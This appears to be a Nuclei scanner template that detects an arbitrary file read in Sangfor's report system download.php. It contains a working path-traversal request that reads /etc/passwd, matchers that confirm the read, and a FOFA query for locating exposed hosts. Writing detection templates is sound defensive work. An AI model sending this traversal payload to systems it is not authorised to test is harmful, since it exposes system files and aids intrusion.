id: sangfor-download-lfi

info:
  name: Sangfor Application download.php - Arbitary File Read
  author: DhiyaneshDk
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the Sangfor Application download.php.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md?plain=1
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="SANGFOR-应用交付报表系统"
  tags: lfi,sangfor

http:
  - method: GET
    path:
      - '{{BaseURL}}/report/download.php?pdf=../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: header
        words:
          - application/force-download
          - 'filename="passwd"'
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a0047304502206fd75b8551fb07778a132650d3cd773914a5d59d2d5c6b294cfe606b0eb40dff022100e32a96aa7049c7bfa6833fbe8d8dace157dbaad9b4e240bbe509e463eaeaae35:922c64590222798bb761d5b6d8e72950
